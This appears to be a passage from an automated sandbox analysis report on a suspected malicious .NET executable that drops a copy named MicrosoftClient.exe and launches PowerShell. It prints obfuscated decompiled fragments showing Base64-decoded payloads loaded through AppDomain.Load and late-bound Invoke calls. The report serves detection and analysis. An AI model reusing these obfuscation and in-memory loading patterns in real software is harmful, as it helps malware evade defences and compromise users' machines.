Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 9RgE5uOJwX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 9RgE5uOJwX.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | .Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Code function: 0_2_00007FFD343D00BD pushad ; iretd 0_2_00007FFD343D00C1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe | Code function: 0_2_00007FFD343D8908 push E95D0F61h; ret 0_2_00007FFD343D8929
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD342ED2A5 pushad ; iretd 2_2_00007FFD342ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD344000BD pushad ; iretd 2_2_00007FFD344000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD344D2316 push 8B485F91h; iretd 2_2_00007FFD344D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD342CD2A5 pushad ; iretd 5_2_00007FFD342CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD343E00BD pushad ; iretd 5_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD344B2316 push 8B485F93h; iretd 5_2_00007FFD344B231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD342BD2A5 pushad ; iretd 8_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD343D00BD pushad ; iretd 8_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD343D19D2 pushad ; ret 8_2_00007FFD343D19E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD344A2316 push 8B485F94h; iretd 8_2_00007FFD344A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD342BD2A5 pushad ; iretd 11_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD343D00BD pushad ; iretd 11_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD344A2316 push 8B485F94h; iretd 11_2_00007FFD344A231B
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Code function: 13_2_00007FFD344000BD pushad ; iretd 13_2_00007FFD344000C1
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe | Code function: 14_2_00007FFD343E00BD pushad ; iretd 14_2_00007FFD343E00C1
Source: 9RgE5uOJwX.exe, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs | High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs | High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: 9RgE5uOJwX.exe, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: 9RgE5uOJwX.exe, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs | High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: 9RgE5uOJwX.exe, YIsiQT0bVRZkgJBchQD3mj8TT.cs | High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.cs | High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: 9RgE5uOJwX.exe, a5vqhNcXHqNHEz8q3VSMya6o4.cs | High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: MicrosoftClient.exe.0.dr, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs | High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs | High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: MicrosoftClient.exe.0.dr, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: MicrosoftClient.exe.0.dr, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs | High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs | High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: MicrosoftClient.exe.0.dr, YIsiQT0bVRZkgJBchQD3mj8TT.cs | High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.cs | High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs | High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: MicrosoftClient.exe.0.dr, a5vqhNcXHqNHEz8q3VSMya6o4.cs | High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs | High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs | High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 